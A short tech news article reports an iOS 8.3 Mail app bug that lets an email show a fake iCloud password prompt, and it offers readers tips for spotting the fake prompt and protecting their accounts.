A new bug found in the stock mail app could potentially be used to steal a user’s iCloud password. A hacker with bad intentions can cleverly display a popup in an email, asking user to enter the password of his or her iCloud email address. What makes the popup, which looks very similar to iOS’s own email prompt capable of easily deceiving the user is that this kind of popups are commonly displayed in the mail app, so an unsuspecting user will enter the password without giving a second thought.
By taking advantage of the vulnerability found in iOS 8.3 an email message can download an HTML based form from a remote server, take the email’s password from the user and then send it back to the attacker. Once the password has been received the attacker can use it to gain access to the account and even change the password if two-step authentication is not turned on.
The popup already displays the email of the user and can be designed to only appear once. This further reduces the chance of user getting suspicious of any wrong doing.
According to ArsTechnica Apple has acknowledged this bug while stating that no users have been affected by it so far. They have also noted that an upcoming software update will fix this bug. Until then if you want to stay on the safe side all you can do is enable the two-step authentication on your iCloud account.
Another thing that can help you in detecting whether a prompt is real or fake is when given a prompt, you can hit the home button. The real prompts won’t let you return to the homescreen until you tap on the ‘OK’ or ‘Cancel’ buttons, while a fake one won’t be able to stop you. You don’t have to worry about losing the prompt as iOS will display it again. [Source]
